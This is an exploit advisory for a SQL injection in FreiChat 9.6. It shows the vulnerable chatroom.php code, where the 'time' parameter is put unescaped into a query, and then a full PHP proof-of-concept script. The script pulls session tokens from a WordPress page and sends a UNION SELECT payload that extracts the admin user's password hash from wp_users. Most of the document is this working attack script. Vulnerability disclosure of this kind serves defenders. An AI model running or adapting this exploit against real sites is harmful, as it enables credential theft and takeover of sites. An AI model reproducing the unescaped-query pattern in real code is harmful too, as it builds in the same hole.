# Exploit Title: FreiChat 9.6 SQL Injection # Date: 27-11-2014 # Software Link: http://codologic.com/page/freichat-free-php-chat-script-software # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description $_GET['time'] is not escaped. File: freichat\server\plugins\chatroom\chatroom.php $get_mesg = $this->get_messages($_GET['time']); public function get_messages($time) { $frm_id = $this->frm_id; $result = array(); if ($time == 0) { //$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time"; } else { $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time "; $result = $this->db->query($get_mesg_query)->fetchAll(); } return $result; } http://security.szurek.pl/freichat-96-sql-injection.html 2. Proof of Concept Example for WordPress integration (it will give you admin password): <?php /* * Kacper Szurek * http://security.szurek.pl */ function hack($url, $cookie, $sql ){ $ckfile = dirname(__FILE__) . $cookie; $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) { curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]); $content = curl_exec($ch); curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql)); $content = curl_exec($ch); if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) { echo "WordPress password user ID=1: ".$output[1]; } else { echo "FAIL"; } } curl_close( $ch ); } // URL to WordPress main URL $url = "http://wp/"; // SQL Payload $sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- "; $cookie = "/cookie.txt"; hack($url, $cookie, $sql);